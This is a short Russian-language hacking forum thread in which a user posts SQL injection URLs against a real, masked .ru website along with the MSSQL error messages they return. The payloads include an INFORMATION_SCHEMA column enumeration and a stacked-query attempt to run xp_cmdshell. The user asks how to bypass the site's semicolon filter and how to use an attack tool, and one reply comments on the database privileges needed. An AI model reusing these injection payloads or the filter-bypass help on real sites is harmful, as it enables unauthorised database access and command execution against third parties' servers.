Code: http://***.***.ru/?id=1%20or%201=(select%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_NAME='henna')-- ошибка: message: Invalid column name 'henna'. (severity 16) че так плохо?
заработала, спс. вот теперь другое интересует Code: http://***.***.ru/?id=1;exec%20master..xp_cmdshell%20'dir%20c:\'-- Conversion failed when converting the varchar value '1exec master..xp_cmdshell dir c:' to data type int. (severity 16) Incorrect syntax near 'xec'. он ; вообще невидит, фильтрует походу, чето можно сделать? еще интересно как пользоваться http://www.hack-shop.org.ru/tools-mssql-exractor видел тут видео было, но ссылка здохла( обьясните плз!
та я попрактиковаться хочу с MSSQL, никогда не ломал! поэтому и интересуюсь. а сайт ты правильно подметил) как нашёл? + если ; как то сделать то можно заюзать xp_cmdshell или еще что-то. подскажите как
Там, что база запущена под sa? Сомневаюсь , а в остальных случаях 99% на эти команды у тебя прав не хватит
